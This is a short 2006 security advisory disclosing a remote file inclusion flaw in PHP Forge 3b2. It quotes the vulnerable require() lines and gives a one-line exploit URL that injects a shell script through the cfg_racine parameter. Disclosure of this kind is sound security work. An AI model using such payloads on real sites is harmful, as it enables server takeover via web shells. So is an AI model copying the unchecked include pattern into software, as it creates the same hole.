Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14726
HistoryOct 19, 2006 - 12:00 a.m.

PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability

2006-10-1900:00:00
vulners.com
24

PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############

Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############

Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############

Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############

Discoverd By : Mahmood_ali
Conatact : mah_k_2000 (at) hotmail (dot) com [email concealed]
############

Special Greetings :_ Tryag-Team
############

bugtraq (at) securityfocus (dot) com [email concealed]

submit (at) milw0rm (dot) com [email concealed]


The new Windows Live Toolbar helps you guard against viruses
http://toolbar.live.com/?mkt=en-gb